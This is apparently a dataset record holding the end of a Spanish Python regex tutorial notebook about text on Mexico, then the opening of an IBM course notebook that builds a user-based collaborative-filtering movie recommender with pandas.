el\nComité\nOrganizador\nse\nencuentra\nel\nhecho\nde\nque\nla\nllamada\nllama\nolímpica\nfue\nencendida\npor\nprimera\nocasión\npor\nuna\nmujer\nEnriqueta\nBasilio\nla\ngacela\nbajacaliforniana\natleta\nde\npista\nEn\njuegos\nolímpicos\nsu\nmejor\nparticipación\nfue\nprecisamente\nen\nesta\nocasión\ncuando\nconsiguió\nnueve\nmedallas\ntres\nde\ncada\nmetal\nQuizá\nla\nmás\nrecordada\nde\nellas\nsean\nlas\nde\nFelipe\nel\nTibio\nMuñoz\noro\nen\nnatación\ny\nla\ndel\nSargento\nJosé\nPedraza\nque\nganó\nla\nplata\nen\ncaminata\nen\nuna\ndisputada\ncarrera\ncontra\nlos\nsoviéticos\nVladimir\nGolubnichy\ny\nNikolav\nSmaga\nOtras\nfiguras\nmemorables\ndel\nolimpismo\nmexicano\nson\nGuillermo\nPérez\nal\nobtener\nel\nprimer\nlugar\nen\ntaekwondo\nrompió\ncon\nla\nracha\nde\n24\naños\nsin\npresea\náurea\nen\nhombres\ndesde\nLos\nÁngeles\n1984\nEn\nel\námbito\nde\nparticipaciones\nfemeninas\nse\nencuentra\nSoraya\nJiménez\nlevantadora\nde\npesas\nla\nprimera\nmujer\nmexicana\nen\nconseguir\nmedalla\nde\noro\nen\nSídney\n2000\ny\nBelem\nGuerrero\nque\nconsiguió\nmedalla\nolímpica\nen\nciclismo\nde\npista\nen\nAtenas\n2004\nOtra\nmujer\nque\ntiene\ndiversas\nparticipaciones\ninternacionales\nes\nAna\nGabr
iela\nGuevara\nquien\nobtuvo\nen\n2002\nla\nIAAF\nGolden\nLeague\nen\natletismo\ny\nfue\nganadora\nde\n2\nmedallas\nde\noro\nen\nla\nCopa\ndel\nMundo\nMadrid\n2002\ny\nla\nde\noro\nen\nel\nCampeonato\nMundial\nde\nAtletismo\nde\n2003\nen\nParís\nPor\notra\nparte\nMéxico\nha\nsido\nsede\nde\nla\nCopa\nMundial\nde\nFútbol\nde\n1970\ny\ntambién\nde\nla\nCopa\nMundial\nde\nFútbol\nde\n1986\nEsta\núltima\nhabía\nsido\nconcedida\na\nColombia\nque\nno\npudo\ncumplir\ncon\nel\ncompromiso\ndebido\na\nun\nlamentable\ndesastre\nnatural\nEn\nla\nprimera\nse\ncoronó\ncampeón\nel\nrepresentativo\nde\nBrasil\nque\nse\nquedó\ncon\nla\ncopa\nJules\nRimet\nEn\n1986\nel\ncampeón\nfue\nArgentina\nMéxico\ntambién\nha\nsido\nsede\nde\nlos\nJuegos\nPanamericanos\nen\n3\nocasiones\n1955\ny\n1975\nen\nCiudad\nde\nMéxico\ny\nen\n2011\nen\nGuadalajara\nde\nlos\nJuegos\nCentroamericanos\ny\ndel\nCaribe\nen\ncuatro\njustas\n1926\n1954\ny\n1990\nen\nCiudad\nde\nMéxico\ny\nen\n2014\nen\nVeracruz\ny\nde\nla\nUniversiada\nde\n1979\nen\ndonde\nha\ncumplido\ncon\nparticipaciones\nnotables\nMéxico\nfue\nel\nprimer\npaís\nen\norganizar\nunos\nJuegos\nOlímpicos\n1968\ny\nun\nCampeonato\nMundial\nde\nFútbol\n1970\nen\nun\nperíodo\nde\ndos\naños\nDespués\nlo\nlograrían\nAlemania\nJuegos\nOlímpicos\nen\n1972\ny\nMundial\n1974\nEstados\nUnidos\nMundial\n1994\ny\nJuegos\nOlímpicos\nde\n1996\ny\nBrasil\nCopa\ndel\nMundo\nde\n2014\ny\nJuegos\nOlímpicos\nde\n2016\nLas\nediciones\nolímpicas\ninvernales\ndonde\nMéxico\nha\nestado\npresente\nson\nSt\nMoritz\n1928\nSarajevo\n1984\nCalgary\n1988\nAlbertville\n1992\nLillehammer\n1994\nSalt\nLake\nCity\n2002\ny\nVancouver\n2010\nen\nlas\ndisciplinas\nde\nEsquí\nalpino\nBobsleigh\nEsquí\nde\nfondo\nPatinaje\nartístico\nsobre\nhielo\ny\nSkeleton\nMéxico\nha\nestado\npresente\nen\nlos\nJuegos\nParalímpicos\nde\nverano\nen\nlas\nediciones\nde\nHeidelberg\n1972\nToronto\n1976\nArnhem\n1980\nNueva\nYork\n1984\nSeúl\n1988\nBarcelona\n1992\nAtlanta\n1996\nSídney\n2000\nAtenas
\n2004\nPekín\n2008\ny\nLondres\n2012\ny\nen\ninvierno\nen\nTurín\n2006\ny\nVancouver\n2010\nHa\nasistido\na\notras\njustas\ndeportivas\ncomo\nlos\nJuegos\nOlímpicos\nde\nla\nJuventud\nen\nsu\nedición\nde\nverano\nen\nSingapur\n2010\ny\nde\ninvierno\nen\nInnsbruck\n2012\nasí\ncomo\ntambién\nha\nacudido\na\nvarias\nediciones\nde\nlas\nOlimpíadas\nde\nAjedrez\ndoc\n" ] ], [ [ "#### Grupos", "_____no_output_____" ], [ "Para cerrar el tema, veremos los grupos, ya vimos como formarlos: con paréntesis `( )`. Pero cada paréntesis que se usa forma un grupo al cuál se le puede hacer referencia despúes.", "_____no_output_____" ] ], [ [ "# Se pueden usar los grupos dentro de la misma expresion\nexpresion = re.compile(r\"\\b(\\w+)\\b(.*?)\\b\\1\\b\")\nbusqueda = expresion.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(1),len(resultado.group(2)))", "1830 43\nMéxico 144\nfederal 74\ntiene 217\nde 124\nel 43\nMéxico 335\nen 56\nel 50\nen 114\nel 128\ny 35\nen 204\nla 100\nla 242\nde 106\nla 189\ny 48\npor 80\nen 191\nes 122\n12 50\ntérmino 809\ncomo 37\nque 206\nde 77\nde 12\ncomo 593\ngentilicio 314\nde 11\ndel 39\nde 52\nes 59\ndel 584\nvocablo 225\nClavijero 179\nque 24\nel 25\ndel 28\nde 13\nlos 80\nde 46\ny 166\nel 24\nde 22\ndel 24\nde 67\ny 49\ny 95\nde 208\nla 31\na 27\nC 57\nde 82\nla 121\ny 81\nde 49\ny 47\nEl 187\nde 40\nla 11\nde 89\nse 136\nel 66\nel 235\nfue 55\nel 133\nSe 211\nen 130\nfueron 83\na 8\nde 13\nperiodo 41\nde 79\nciudades 143\ny 38\nse 150\ny 54\nen 53\nla 101\ny 47\nde 104\nla 53\nobsidiana 7\ny 101\nde 74\ny 52\nla 15\nalgunos 113\nde 19\nobsidiana 7\ny 101\nde 144\nTeotihuacán 68\nla 72\nen 44\nde 103\npiedra 232\ncon 30\nfecha 17\nla 63\nlos 43\nlos 18\nque 154\nel 46\ndios 48\ndel 54\ndios 44\ndel 23\nla 32\nciudades 141\nla 48\nestaban 51\nla 33\npara 82\nde 178\npara 36\ny 104\nel 19\nsur 18\ny 64\nciudad 120\nde 37\nla 152\nse 19\nse 153\nla 34\nde 55\nperiodo 41\nun 151\nLa 294\nse 180\nen 282\nque 11\ndel 45\ncon 
171\nsu 400\nde 104\nde 44\ndel 183\nque 8\nsu 53\ngran 16\npoder 158\nde 18\nde 23\nCortés 137\nla 25\ncomo 46\nespañoles 304\npero 104\nel 71\nde 8\ny 225\nde 52\nel 45\nse 256\nen 49\nla 27\nde 40\nLa 217\nel 310\na 9\nEl 478\ncomercio 198\nla 229\ny 229\nMonte 47\nde 125\ndel 18\nen 141\nde 46\nfe 165\nde 90\ny 177\nla 127\nde 16\nla 15\nde 47\nla 79\nen 155\nse 88\nmuchas 113\nde 31\nde 205\nEn 323\ny 45\nen 277\nde 86\ny 413\nel 100\nde 15\nde 12\nde 10\nde 49\nel 410\nde 26\nEl 117\nfue 215\nde 49\ncomo 26\ny 104\nde 101\na 9\nla 66\ndel 8\nen 221\nen 46\nse 23\nMéxico 458\ny 7\nde 179\nSanta 166\nLa 622\ny 70\nde 25\nJuárez 151\nfue 232\npor 197\nsociales 448\ny 152\nde 6\ny 35\nEn 330\nCarranza 117\nfue 232\nelecto 385\nCárdenas 53\nla 12\ny 148\nla 150\nen 109\nel 428\nde 37\npor 140\nde 11\nla 67\nla 76\nen 312\nla 124\nde 190\nla 88\nen 27\ncomo 31\nla 19\nen 141\nel 57\nde 16\nSu 256\nEZLN 276\nEn 268\nse 353\nen 234\nde 41\nde 56\nla 127\nel 60\nde 28\nMéxico 194\ndel 184\ny 141\nPoder 178\nde 51\nla 40\nde 84\nde 46\ny 445\nprovisional 135\nel 27\nde 230\nlas 36\ny 39\nde 189\nde 182\nde 282\nla 236\npara 168\nde 18\nla 16\nde 38\nde 20\ny 180\nde 11\nla 99\nAuditoria 513\ndel 229\nnacional 477\nla 15\nde 32\nde 80\nen 28\nEl 474\nFederal 113\nen 341\ntodos 139\nde 47\nde 10\nla 283\nConstitución 628\ny 280\nde 142\nLas 256\nde 84\ncomo 206\nde 30\nestados 39\nde 57\ny 139\nde 39\npoderes 424\nde 50\nlas 38\nlos 21\nse 352\nmunicipio 97\nen 106\nmunicipios 35\nes 64\nlos 336\nde 44\ncon 21\nde 38\nlos 34\na 23\ny 155\nun 106\ny 388\nla 30\ndel 439\nde 7\nen 360\nEn 395\nde 15\npolítica 591\nEn 456\nde 22\nse 169\ndel 274\nla 75\nde 70\nla 44\nde 48\nMéxico 54\npor 18\na 21\nla 23\nde 43\nla 114\ncon 33\nde 97\ny 42\ndel 110\npaís 283\nen 42\ny 137\nFuerzas 411\nlo 5\nde 63\nen 18\nde 27\nla 51\nde 17\ny 72\nel 290\nde 48\nla 45\nel 118\nla 259\nde 20\nel 11\nde 18\npesos 21\npara 29\nMéxico 422\npaís 870\n3 432\nse 96\nla 31\nLlanura 114\nde 138\nla 
23\ny 11\nlas 72\nSierra 142\nEje 171\nde 82\nel 42\nm 25\nel 50\nel 27\nde 58\nde 62\nde 42\nChiapas 22\nmás 296\nes 85\nlas 177\nde 98\ny 109\nvalles 56\nde 103\nel 280\nen 174\nel 227\npaís 64\nen 96\nclimas 191\nesta 511\nlas 79\nentre 46\nlos 63\nclima 209\nde 12\nla 114\ny 65\ntipo 280\nde 53\nel 26\nde 27\nEl 284\nprecipitación 94\nes 101\nLa 107\nes 253\nde 35\nde 81\nla 52\nmm 14\nde 29\nC 94\ny 128\nríos 127\nes 174\nel 76\nrío 155\nel 238\nrío 162\nen 24\nde 10\nlagos 217\nel 20\nel 125\nMéxico 95\nMéxico 199\nel 17\nen 25\nde 134\nde 34\n4 67\nUno 740\nen 133\nde 45\ndel 128\nla 62\nde 47\nla 39\nde 19\nla 167\nel 165\nde 124\nen 82\nel 44\nde 21\nla 42\nde 17\ny 13\nen 147\nde 5\ny 172\na 63\nen 52\nla 175\nel 473\nde 53\nla 32\nde 297\nel 123\nel 18\ndel 361\nel 44\nque 161\nse 94\ny 39\nde 19\nLa 219\neconomía 201\nen 52\nlos 96\ny 35\nse 63\npor 64\nque 86\npara 92\npor 35\nen 63\nla 129\ny 44\nque 76\nde 66\n0 153\nde 9\nmillones 70\nen 58\nun 66\nde 20\ny 14\nen 215\nlas 38\nla 43\na 133\nmillones 90\nde 68\na 366\nla 73\nen 16\nel 64\nla 17\ndel 212\ny 326\npor 45\nde 60\ndel 14\nde 205\nlibre 309\ncon 19\nes 37\nen 68\nen 24\ny 149\nde 11\ndurante 95\nel 22\nde 35\nde 23\nla 67\nen 27\nMéxico 51\nla 27\nde 108\nreservas 31\nen 41\nde 29\nde 53\nturismo 338\nel 100\nde 35\nde 107\nde 21\nde 79\nde 32\nlas 26\ny 369\nen 472\nde 51\ny 180\nde 21\nde 60\nde 68\nque 15\nen 171\nde 66\nde 103\nla 94\nimagen 134\na 836\nde 15\na 260\nlas 144\ny 271\nde 9\nla 58\nmexicana 561\nel 21\nnacional 696\na 16\nde 13\nun 411\nque 27\nMéxico 102\nel 107\nde 23\nla 176\nno 9\nel 83\nen 143\nde 19\n0 29\nla 64\nde 44\nde 143\ny 134\nen 145\nde 22\nde 137\nen 160\nel 92\nla 13\nen 99\nde 40\nde 7\nenergía 118\ngeotérmica 35\nSegún 500\nde 12\nen 13\nEn 263\nel 113\nde 28\nCampeche 52\nde 50\nla 60\nde 8\nvías 665\nde 34\nMéxico 31\ncon 98\nel 141\nla 98\nde 8\nen 470\nel 195\nMéxico 161\ny 242\nel 109\nel 245\nde 16\ny 33\nel 115\nde 16\nel 183\nde 79\nla 146\ndel 
71\nde 39\nde 11\nde 19\nel 64\na 60\nde 32\nde 9\nde 28\nla 40\nla 40\nla 169\ncosta 55\nde 50\nla 33\nde 81\nMéxico 17\nEl 365\nel 39\nCanal 71\na 52\nla 63\nde 29\nde 21\nEn 110\nmuchas 246\nestaciones 189\nde 66\nMéxico 139\nen 25\nLa 102\nteléfono 96\nen 159\nde 17\nde 10\nde 29\nque 243\nLas 670\nde 32\ny 105\nMéxico 224\nel 18\nEn 184\nlos 89\nel 29\nel 35\ndiarios 166\nde 85\nlos 62\nMéxico 716\nla 34\nde 15\nradio 314\nciudades 145\nen 19\nque 59\nde 46\nEl 432\nla 14\nde 15\nagua 158\nel 147\nde 30\nde 12\nLa 166\npoblación 311\nde 47\na 54\nla 67\npoblación 107\npor 382\nel 478\nla 56\náreas 264\nque 104\nse 123\nextienden 78\nde 13\nMéxico 2\ny 11\nde 38\nse 492\nde 48\nEl 140\nen 61\nla 9\nen 268\nla 17\nuna 46\nde 20\nMéxico 92\nuna 146\nde 93\nde 56\nen 165\npor 60\nla 154\npoblación 86\nde 43\nla 11\nde 93\nla 49\nde 29\nla 24\ngrupos 271\nel 21\nde 31\n1 28\nde 96\nla 258\nde 174\ninmigración 255\nen 234\npaís 447\nlos 27\nMéxico 205\nde 99\ny 238\nde 9\nextranjeros 40\nMéxico 466\nel 82\nde 80\nlos 139\ny 91\nde 11\nel 113\nde 127\ncon 25\nla 22\nen 164\nque 86\nde 15\nes 123\nque 236\nreligión 42\nde 44\nde 14\nLa 388\ncon 449\nla 15\nde 82\nsegunda 157\nmundial 182\nen 111\nlas 30\nlas 102\ncomo 124\nen 50\nlos 12\ndel 132\ncristianismo 110\nde 17\nen 171\nlos 28\ny 50\nsincretismo 63\nen 20\nes 313\nLa 317\nse 313\ncatólicos 85\nde 54\nmillones 17\nde 18\ndel 14\nEn 518\nlos 114\nen 70\nun 269\nque 146\ncon 389\nla 17\ncomo 129\ny 303\nque 153\nuna 96\nen 37\ny 81\nel 298\nla 24\ndel 136\nde 64\nelementos 330\nde 23\nla 136\nel 448\nde 23\nlos 194\nque 17\nde 277\nhablantes 139\nno 432\ny 118\nla 31\nde 36\nla 30\ndel 195\nMéxico 355\nse 59\nen 61\nde 34\no 54\nen 27\nEl 179\nque 229\nde 42\ntiene 569\nlos 179\nde 60\nde 102\nen 23\nde 11\nse 335\nde 22\nSan 10\nde 92\nlengua 24\nde 26\nen 39\nque 41\nla 41\nlengua 35\nde 7\nde 10\nde 93\nun 33\nde 38\npor 31\nde 110\nde 241\nlos 20\ny 51\nel 28\nsistema 46\nde 126\nde 24\nMéxico 386\nel 
231\nde 37\nel 418\nEl 166\nde 12\nla 103\nde 234\neducación 1131\nde 69\nen 99\nNacional 44\nde 33\nque 81\nla 86\nde 52\nla 59\nEn 530\nde 114\nmexicano 565\ndel 40\nde 15\nEn 433\nde 15\nde 44\nen 301\nla 42\nópera 137\nde 84\nla 216\noperística 255\nde 136\ndel 119\ndifusión 313\nde 120\nla 22\nde 116\nde 54\nun 230\nde 32\nel 28\ny 75\nLa 193\ndanza 329\ndel 740\nen 148\nla 117\nmúsica 156\nde 27\nes 362\nel 531\nde 135\nla 42\ncon 149\ncantantes 33\ndel 75\nson 261\nson 22\ny 59\nla 36\nde 142\nde 31\nla 15\nuna 52\nel 28\nlos 108\ndel 58\nno 36\npor 180\nde 40\nbolero 245\nde 23\nmúsica 430\ny 29\nde 221\nentre 222\nLa 95\nen 49\ny 205\nel 98\nmúsica 225\nen 214\nde 92\nel 16\na 46\nmariachi 72\na 16\nson 41\nde 22\nmúsica 454\ncon 190\ny 41\ny 41\nmúsica 577\ny 79\nse 190\nla 210\nla 119\na 358\nLa 145\nel 34\nmovimiento 56\nde 92\nlos 144\nDurante 168\nlas 118\na 50\nlos 126\nlos 145\nen 25\nla 162\nque 56\nse 49\nse 419\nlas 105\ny 69\nde 37\nel 112\nlos 444\nde 25\nse 103\nla 22\nel 14\npaso 117\na 541\ny 30\nla 232\nde 39\nde 47\nel 19\nde 38\nla 106\nJuan 8\nJosé 79\nde 66\nMéxico 331\ngrupo 163\nLa 53\nen 77\nlas 191\nde 16\nlas 15\nel 82\nde 15\nque 68\nse 442\nde 26\nlos 235\ny 54\ndel 202\nJosé 82\nLa 282\ny 46\nla 41\nde 36\nel 12\nde 106\ninfluencia 462\nde 124\ny 38\nde 40\nThomas 22\nen 35\nde 101\na 162\nuna 527\ndel 124\ndel 20\ny 35\nla 28\nla 58\nde 9\nla 63\nurbanismo 177\nla 37\nde 28\nla 294\nel 72\ny 51\nel 11\na 339\nde 34\nla 55\nde 46\nidentidad 167\narquitectura 204\ndel 13\nde 55\nde 70\nde 100\ncon 187\nde 27\nque 210\nla 7\nde 14\ndel 223\nde 68\ny 102\ny 18\ny 17\ny 17\ny 8\nLas 188\npelículas 726\nde 10\ndel 142\nel 29\nal 73\ny 52\nque 125\nel 315\ncomo 176\nse 238\nde 107\nsu 204\nen 383\nque 36\nsus 13\nla 50\nHumanidad 394\norigen 145\nel 7\nen 218\nla 60\nel 162\nla 120\nde 41\nel 9\nla 280\nde 81\nen 25\ny 79\nel 49\nLa 120\nde 38\nde 159\nlos 51\nla 103\nsu 519\ny 150\nde 12\ncon 83\ncarne 29\nde 52\nlas 40\nel 12\nel 
10\nel 23\nun 327\nsector 278\nen 69\nEn 450\nla 344\nde 53\nmexicana 258\ny 33\nel 443\ndel 10\nsiglo 117\nde 70\ncon 388\nun 211\nde 7\n2010 136\nel 33\nde 7\nse 194\nde 33\nun 641\nrecorrido 116\nla 41\nde 104\nla 303\nde 165\nun 104\nconstante 145\ndeportes 93\nel 18\nde 49\ny 62\nla 10\nLiga 71\nmayor 639\nde 61\nde 18\nla 18\na 25\nLa 226\nselección 100\nde 51\nla 57\ndeporte 142\nmás 45\nen 330\ny 167\ntiene 428\na 24\nque 113\nde 11\nen 88\nla 24\nLiga 41\nNorte 26\nde 29\nBéisbol 41\nde 36\nla 31\nLiga 33\nde 45\nBéisbol 119\nson 58\nen 16\nla 9\nEn 264\nla 30\nsede 105\nel 33\nlos 49\nla 104\nla 57\nEl 1268\nde 32\nel 55\nde 24\nVoleibol 92\ny 537\nde 26\nla 57\nEn 355\nla 63\nCiudad 241\nde 16\nde 102\nde 35\nde 22\nel 181\nla 67\nLa 129\nen 13\nque 220\nla 345\ny 147\nde 254\nen 13\nTrinquete 66\nFemenil 33\nde 27\nla 13\nla 175\nde 31\nMéxico 229\n1968 117\nde 8\nEl 371\nlucha 282\nel 88\nLa 106\nPlaza 44\nque 49\nde 14\nCiudad 92\nMéxico 335\nde 75\ne 198\nMéxico 72\nen 7\nel 43\nen 294\ny 78\nGuanajuato 18\nde 42\nel 11\nde 31\nMéxico 288\nfue 335\npor 17\nuna 354\nel 114\nde 68\nla 261\nen 47\nla 30\nde 30\nMéxico 358\nha 276\nMéxico 362\ny 111\nha 447\nde 16\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ] ]
e72fb7c741490e2003c5d80ba74186be748852fd
78,663
ipynb
Jupyter Notebook
ML0101EN-RecSys-Collaborative-Filtering-movies-py-v1.ipynb
CosmiX-6/Mahine-Learning-with-Python
f04b9db4ecad9610d3097ea08c8024af428eaa45
[ "BSD-4-Clause-UC" ]
null
null
null
ML0101EN-RecSys-Collaborative-Filtering-movies-py-v1.ipynb
CosmiX-6/Mahine-Learning-with-Python
f04b9db4ecad9610d3097ea08c8024af428eaa45
[ "BSD-4-Clause-UC" ]
null
null
null
ML0101EN-RecSys-Collaborative-Filtering-movies-py-v1.ipynb
CosmiX-6/Mahine-Learning-with-Python
f04b9db4ecad9610d3097ea08c8024af428eaa45
[ "BSD-4-Clause-UC" ]
null
null
null
30.667836
2,822
0.447707
[ [ [ "<center>\n <img src=\"https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ML0101EN-SkillsNetwork/labs/Module%205/images/IDSNlogo.png\" width=\"300\" alt=\"cognitiveclass.ai logo\" />\n</center>\n\n# Collaborative Filtering\n\nEstimated time needed: **25** minutes\n\n## Objectives\n\nAfter completing this lab you will be able to:\n\n* Create recommendation system based on collaborative filtering\n", "_____no_output_____" ], [ "Recommendation systems are a collection of algorithms used to recommend items to users based on information taken from the user. These systems have become ubiquitous can be commonly seen in online stores, movies databases and job finders. In this notebook, we will explore recommendation systems based on Collaborative Filtering and implement simple version of one using Python and the Pandas library.\n", "_____no_output_____" ], [ "<h1>Table of contents</h1>\n\n<div class=\"alert alert-block alert-info\" style=\"margin-top: 20px\">\n <ol>\n <li><a href=\"https://#ref1\">Acquiring the Data</a></li>\n <li><a href=\"https://#ref2\">Preprocessing</a></li>\n <li><a href=\"https://#ref3\">Collaborative Filtering</a></li>\n </ol>\n</div>\n<br>\n<hr>\n", "_____no_output_____" ], [ "<a id=\"ref1\"></a>\n\n# Acquiring the Data\n", "_____no_output_____" ], [ "To acquire and extract the data, simply run the following Bash scripts:\\\nDataset acquired from [GroupLens](http://grouplens.org/datasets/movielens/?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01). Let's download the dataset. To download the data, we will use **`!wget`** to download it from IBM Object Storage.\\\n**Did you know?** When it comes to Machine Learning, you will likely be working with large datasets. As a business, where can you host your data? 
IBM is offering a unique opportunity for businesses, with 10 Tb of IBM Cloud Object Storage: [Sign up now for free](http://cocl.us/ML0101EN-IBM-Offer-CC)\n", "_____no_output_____" ] ], [ [ "!wget -O moviedataset.zip https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ML0101EN-SkillsNetwork/labs/Module%205/data/moviedataset.zip\nprint('unziping ...')\n!unzip -o -j moviedataset.zip ", "--2021-09-11 13:35:55-- https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ML0101EN-SkillsNetwork/labs/Module%205/data/moviedataset.zip\nResolving cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud (cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud)... 169.63.118.104\nConnecting to cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud (cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud)|169.63.118.104|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 160301210 (153M) [application/zip]\nSaving to: ‘moviedataset.zip’\n\nmoviedataset.zip 100%[===================>] 152.88M 41.1MB/s in 3.7s \n\n2021-09-11 13:35:59 (41.1 MB/s) - ‘moviedataset.zip’ saved [160301210/160301210]\n\nunziping ...\nArchive: moviedataset.zip\n inflating: links.csv \n inflating: movies.csv \n inflating: ratings.csv \n inflating: README.txt \n inflating: tags.csv \n" ] ], [ [ "Now you're ready to start working with the data!\n", "_____no_output_____" ], [ "<hr>\n\n<a id=\"ref2\"></a>\n\n# Preprocessing\n", "_____no_output_____" ], [ "First, let's get all of the imports out of the way:\n", "_____no_output_____" ] ], [ [ "#Dataframe manipulation library\nimport pandas as pd\n#Math functions, we'll only need the sqrt function so let's import only that\nfrom math import sqrt\nimport numpy as np\nimport matplotlib.pyplot as plt\n%matplotlib inline", "_____no_output_____" ] ], [ [ "Now let's read each file into their Dataframes:\n", "_____no_output_____" ] ], [ [ "#Storing the movie 
information into a pandas dataframe\nmovies_df = pd.read_csv('movies.csv')\n#Storing the user information into a pandas dataframe\nratings_df = pd.read_csv('ratings.csv')", "_____no_output_____" ] ], [ [ "Let's also take a peek at how each of them are organized:\n", "_____no_output_____" ] ], [ [ "#Head is a function that gets the first N rows of a dataframe. N's default is 5.\nmovies_df.head()", "_____no_output_____" ] ], [ [ "So each movie has a unique ID, a title with its release year along with it (Which may contain unicode characters) and several different genres in the same field. Let's remove the year from the title column and place it into its own one by using the handy [extract](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.str.extract.html?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01#pandas.Series.str.extract) function that Pandas has.\n", "_____no_output_____" ], [ "Let's remove the year from the **title** column by using pandas' replace function and store in a new **year** column.\n", "_____no_output_____" ] ], [ [ "#Using regular expressions to find a year stored between parentheses\n#We specify the parantheses so we don't conflict with movies that have years in their titles\nmovies_df['year'] = movies_df.title.str.extract('(\\(\\d\\d\\d\\d\\))',expand=False)\n#Removing the parentheses\nmovies_df['year'] = movies_df.year.str.extract('(\\d\\d\\d\\d)',expand=False)\n#Removing the years from the 'title' column\nmovies_df['title'] = movies_df.title.str.replace('(\\(\\d\\d\\d\\d\\))', '')\n#Applying the strip function to get rid of any ending whitespace characters that may have appeared\nmovies_df['title'] = movies_df['title'].apply(lambda x: x.strip())", "_____no_output_____" ] ], [ [ "Let's look at the result!\n", "_____no_output_____" ] ], [ [ "movies_df.head()", 
"_____no_output_____" ] ], [ [ "With that, let's also drop the genres column since we won't need it for this particular recommendation system.\n", "_____no_output_____" ] ], [ [ "#Dropping the genres column\nmovies_df = movies_df.drop('genres', 1)", "_____no_output_____" ] ], [ [ "Here's the final movies dataframe:\n", "_____no_output_____" ] ], [ [ "movies_df.head()", "_____no_output_____" ] ], [ [ "<br>\n", "_____no_output_____" ], [ "Next, let's look at the ratings dataframe.\n", "_____no_output_____" ] ], [ [ "ratings_df.head()", "_____no_output_____" ] ], [ [ "Every row in the ratings dataframe has a user id associated with at least one movie, a rating and a timestamp showing when they reviewed it. We won't be needing the timestamp column, so let's drop it to save on memory.\n", "_____no_output_____" ] ], [ [ "#Drop removes a specified row or column from a dataframe\nratings_df = ratings_df.drop('timestamp', 1)", "_____no_output_____" ] ], [ [ "Here's how the final ratings Dataframe looks like:\n", "_____no_output_____" ] ], [ [ "ratings_df.head()", "_____no_output_____" ] ], [ [ "<hr>\n\n<a id=\"ref3\"></a>\n\n# Collaborative Filtering\n", "_____no_output_____" ], [ "Now it's time to start our work on recommendation systems.\n\nThe first technique we're going to take a look at is called **Collaborative Filtering**, which is also known as **User-User Filtering**. As hinted by its alternate name, this technique uses other users to recommend items to the input user. It attempts to find users that have similar preferences and opinions as the input and then recommends items that they have liked to the input. 
There are several methods of finding similar users (Even some making use of Machine Learning), and the one we will be using here is going to be based on the **Pearson Correlation Function**.\n\n<img src=\"https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ML0101EN-SkillsNetwork/labs/Module%205/images/User_Item.png\" width=800px>\n\nThe process for creating a User Based recommendation system is as follows:\n\n* Select a user with the movies the user has watched\n* Based on his rating to movies, find the top X neighbours\n* Get the watched movie record of the user for each neighbour.\n* Calculate a similarity score using some formula\n* Recommend the items with the highest score\n\nLet's begin by creating an input user to recommend movies to:\n\nNotice: To add more movies, simply increase the amount of elements in the userInput. Feel free to add more in! Just be sure to write it in with capital letters and if a movie starts with a \"The\", like \"The Matrix\" then write it in like this: 'Matrix, The' .\n", "_____no_output_____" ] ], [ [ "userInput = [\n {'title':'Breakfast Club, The', 'rating':5},\n {'title':'Toy Story', 'rating':3.5},\n {'title':'Jumanji', 'rating':2},\n {'title':\"Pulp Fiction\", 'rating':5},\n {'title':'Akira', 'rating':4.5}\n ] \ninputMovies = pd.DataFrame(userInput)\ninputMovies", "_____no_output_____" ] ], [ [ "#### Add movieId to input user\n\nWith the input complete, let's extract the input movies's ID's from the movies dataframe and add them into it.\n\nWe can achieve this by first filtering out the rows that contain the input movies' title and then merging this subset with the input dataframe. We also drop unnecessary columns for the input to save memory space.\n", "_____no_output_____" ] ], [ [ "#Filtering out the movies by title\ninputId = movies_df[movies_df['title'].isin(inputMovies['title'].tolist())]\n#Then merging it so we can get the movieId. 
It's implicitly merging it by title.\ninputMovies = pd.merge(inputId, inputMovies)\n#Dropping information we won't use from the input dataframe\ninputMovies = inputMovies.drop('year', 1)\n#Final input dataframe\n#If a movie you added in above isn't here, then it might not be in the original \n#dataframe or it might spelled differently, please check capitalisation.\ninputMovies", "_____no_output_____" ] ], [ [ "#### The users who has seen the same movies\n\nNow with the movie ID's in our input, we can now get the subset of users that have watched and reviewed the movies in our input.\n", "_____no_output_____" ] ], [ [ "#Filtering out users that have watched movies that the input has watched and storing it\nuserSubset = ratings_df[ratings_df['movieId'].isin(inputMovies['movieId'].tolist())]\nuserSubset.head()", "_____no_output_____" ] ], [ [ "We now group up the rows by user ID.\n", "_____no_output_____" ] ], 